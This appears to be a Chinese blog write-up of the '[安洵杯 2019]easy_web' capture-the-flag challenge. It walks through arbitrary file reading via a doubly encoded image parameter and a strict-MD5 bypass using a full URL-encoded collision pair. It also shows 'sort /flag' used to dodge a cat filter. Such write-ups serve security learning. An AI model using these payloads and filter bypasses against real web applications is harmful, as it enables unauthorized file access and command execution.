[安洵杯 2019]easy_web

进入之后发现是一个比较有趣的页面，啥也没，老规矩查看源码，在最后发现了一句话

感觉会和md5有关

返回当前页面，感觉这个url有点长，仔细观察

http://290ed624-6247-4599-aa59-dd6c05c6eb9d.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=

这个好像是base64的，来解码一下

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PgeE7LIp-1588041288812)(https://upload-images.jianshu.io/upload_images/18308497-9ce01c3c6e196462.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

解了两步，发现有点像16进制转字符串，继续，得到这个

感觉类似任意文件读取，我尝试这用同样的方法读一下flag.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P6lCMj6y-1588041288813)(https://upload-images.jianshu.io/upload_images/18308497-6cbd748dbbb59c22.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

绝壁有过滤，那我换个读读，这次读index.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Xwnt8xLC-1588041288814)(https://upload-images.jianshu.io/upload_images/18308497-02267e32bd8ac196.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

发现这个文件损坏了，查看源码发现能得到base64之后的php源码

诶，首先想到昨天做的md5强类型比较，感觉先试试数组绕过

（先右键修改传参方式！！）

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DyqwCF3A-1588041288814)(https://upload-images.jianshu.io/upload_images/18308497-9e82a06e9bd379f9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

发现不太行，再看源码才发现只能用字符串0.0

此时百度强类型怎么办，几乎出来的都是固定的exp（参考https://xz.aliyun.com/t/2232）

a=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D1B%A9%11U%DD%AF%15vu%0F%DA%F6%7Dd%8B%DE%0A%AD%91r%DE%8De%07%9AC%AE%2A%BAF%DBw%BD%BB%E3%DE%E0%AD4gZ_%5C%13%1E%19F%28%7B%A8%D1%7F%2C%17%9BO%12%B4%8A%2B%DA%B9%E1%0F%0F%EBAT%07%213kujM%9DS%97%02%B3M%5DHd%DC%91%C1%AB%C3+%E8%B7_%A8%C7%D3%FDz%E8%9F%021%1E4%01%C83%12%0C%1B%8C%F6%CA%CA%CA%93K%40%5D%94%C8%AE%D0%A6%09Q%2B&b=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D1B%A9%11U%DD%AF%15vu%0F%DA%F6%7Dd%8B%DE%0A%AD%11r%DE%8De%07%9AC%AE%2A%BAF%DBw%BD%BB%E3%DE%E0%AD4gZ_%5C%13%9E%19F%28%7B%A8%D1%7F%2C%17%9BO%12%B4%0A%2B%DA%B9%E1%0F%0F%EBAT%07%213kujM%9DS%97%02%B3M%5D%C8d%DC%91%C1%AB%C3+%E8%B7_%A8%C7%D3%FDz%E8%9F%021%1E4%01%C83%12%8C%1A%8C%F6%CA%CA%CA%93K%40%5D%94%C8%AEP%A6%09Q%2B

之后是过正则，发现过滤了cat，emm我记得还可以用sort，果然直接

Sort /flag 出flag

得到flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-H1toGyvR-1588041288815)(https://upload-images.jianshu.io/upload_images/18308497-87ded5de5270bea6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

（PS：网上代码审计说 这里有一个点，对于 php 来说，正则需要使用 \\ 来匹配才能匹配到反斜杠，所以实际上反斜杠还能用。或者

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ty1Q1npJ-1588041288815)(https://upload-images.jianshu.io/upload_images/18308497-3177916e3fcf4270.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

学到了 学到了 大佬们tql）